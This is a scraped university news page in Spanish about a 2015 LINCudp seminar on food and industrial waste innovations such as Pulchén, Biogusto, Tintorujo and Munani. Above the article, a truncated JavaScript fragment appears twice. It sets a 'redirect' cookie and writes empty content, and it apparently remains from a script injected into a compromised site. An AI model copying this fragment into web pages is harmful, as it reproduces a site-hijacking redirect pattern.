=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " /> =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " />

Noticias

LINCUDP presentó “Recetas para la innovación”

20 Oct 2015

Compartir:

Con el objetivo de generar vínculos de investigación con otros países, el laboratorio de Innovación y Creatividad (LINCudp) de la Universidad Diego Portales, en conjunto con la secretaría ejecutiva del pabellón chileno, realizó el seminario llamado DAT, Design Attractivity Territory, donde se planteó la crisis de la alimentación.

La actividad estuvo dirigida por Eugenio Grove,  director del Laboratorio de Innovación y Creatividad (LINCudp) de la Universidad Diego Portales junto a Massimiliano Mandarini arquitecto y profesor del Politécnico de Milán. En la ocasión se mostraron variadas iniciativas relacionadas a las categorías “diseñando el atractivo de los territorios” y “recetas para la innovación”.

“Dentro de la línea estrategica principal del laboratorio es trabajar en transformar los residuos industriales en nuevos productos. Incorporarlos en hacer nuevas líneas de nichos y mercados”, explicó Grove, quien agregó que esta propuesta de valor considera transformar los residuos industriales en las nuevas materias primas 2.0, impactando positivamente en el desarrollo económico local y la creación de nuevas industrias.

Los destacados fueron Pulchén, un producto gourmet para parrilleros que consiste en una briqueta elaborada a base de carozos reciclados; Biogusto, packaging biodegradable que puede competir en igualdad de condiciones con el papel y el plástico; Tintorujo, que a través del desecho de la uva en la producción del vino, crea una harina con alto contenido de fibra y poder antioxidante susceptible de ser utilizada en muchas preparaciones. Por último, Munani, que a través del cochayuyo y luche (cosechado por los Algueras de Navidad), crea un alimento con tremendo potencial nutricional y propiedades beneficiosas para la salud.

Partners

Media Partner